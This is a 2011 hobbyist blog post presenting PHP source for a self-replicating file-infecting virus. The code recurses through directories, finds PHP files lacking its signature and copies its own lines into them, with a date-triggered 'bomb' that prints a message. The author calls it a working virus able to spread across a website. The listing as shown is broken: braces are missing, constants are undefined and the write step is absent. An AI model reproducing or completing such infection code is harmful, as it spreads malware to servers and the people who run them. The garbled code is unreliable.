Skip to content

How to Create a Computer Virus

November 29, 2011

I was sick (and bored) this week, and my brain didn’t want to do any work. I was laying in bed with a cold/flu virus, thinking about modern day computer viruses while shaking my head in disappointment (or virii for the 90’s hackers… hereinafter shall be referred to as “viruses” for everyone else’s sake). Computer viruses these days are a joke. They’re not very stealth, they don’t spread very far, and they can be removed far too easily. Once upon a time, viruses were a form of art… and they were ALL written in Assembly. Anything less (or shall I say more), was considered a joke. The traditional computer virus’ job was simple:

Search for infectable files.
Check for virus signature.
If it exists, it’s infected. Keep searching. If not, infect it using the bytes from one of the infected files.
Don’t bomb the computer until a trigger of some sort.. eg: a particular date.

And that’s all there is to it. Some consider computer viruses as the most primitive form of artificial intelligence because its primary function is to replicate itself or “spawn” just like any other life form. Since virus authors today like to write viruses in higher-level languages, I decided to write my own virus in a higher-level language… nevertheless, keeping the traditional methods of replication and bombing. I wrote it in PHP and I did this for fun. It took me no longer than the duration of 2 Twilight Zone (original series) episodes. It’s educational, but please take caution if you run it. It IS a working virus and it WILL recurse directories and infect other PHP files… which in turn will infect other PHP files. The “bomb” portion of the virus doesn’t do anything malicious… it just prints a “HAPPY BIRTHDAY CRANKY!” to the screen on my actual birthday. The interesting thing about writing a virus in PHP is that a) it can run on Windows, OS X, and *nix and b) once it infects a website, any php file that is run as a direct result of a user visiting your website will cause the virus to run and infect other php files and, if triggered on the correct day, say “HAPPY BIRTHDAY CRANKY!” on the said website… unless of course, it runs into file permission restrictions.

// determine whether backslash or forward slashes are used
define("SLASH", stristr($_SERVER['PWD'], "/") ? "/" : "\\");
$linenumber = __LINE__;
function search($path){
    $ret = "";
    $fp = opendir($path);
    while($f = readdir($fp)){
        if( preg_match("#^\.+$#", $f) ) continue; // ignore symbolic links
        $file_full_path = $path.SLASH.$f;
        if(is_dir($file_full_path)) { // if it's a directory, recurse
            $ret .= search($file_full_path);
        } else if( !stristr(file_get_contents($file_full_path), SIGNATURE) ) { // search for uninfected files to infect
            $ret .= $file_full_path."\n";
    return $ret;
function infect($filestoinfect){
    $handle = @fopen(__FILE__, "r");
    $counter = 1;
    $virusstring = ""; 
    while(($buffer=fgets($handle,4096)) !== false){
        if($counter>=STARTLINE && $counter<=ENDLINE){
            $virusstring .= $buffer;
    $filesarray = array();
    $filesarray = explode("\n",$filestoinfect);
    foreach($filesarray AS $v){
            $filecontents = file_get_contents($v);
function bomb(){
    if(date("md") == 0125){
        echo "HAPPY BIRTHDAY CRANKY!";
$filestoinfect = search(__DIR__);

You can also download the source code here.

To test it out, I wrote a bunch of short and simple php files and placed it in the same folder. Then I made a subfolder and put some php files in there. Then I made a subsubfolder and put some php files in there as well. I ran the virus and what do you know? It infected ALL the php files. By changing a couple characters in the regex, I can make this recurse up the directory structure as well… but I didn’t. Enjoy, be safe, and don’t be a malicious script kiddy.


From → Hacks

  1. Malcolm permalink

    Wow, I’ve been looking through your blog and you have some truly awesome content!

  2. ezekieljd permalink

    So what exactly does this do? In terms a layman would understand? 😀

  3. MadLord permalink

    Hi !
    I tried to upload and run the script on my server without the if(date(“md”) == 0125): with just a echo in bomb() and it did not infect an php file…
    I don’t understand.

  4. Figo Louis permalink


Trackbacks & Pingbacks

  1. How to Make a Simple Computer Virus with Python «
  2. How to Create a Virus Using the Assembly Language |
  3. 如何使用汇编语言编写一个病毒 | | hg0088
  4. Comment créer un virus informatique simple avec Python - ecrire son livre de recette - Comment écrire un livre ?

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: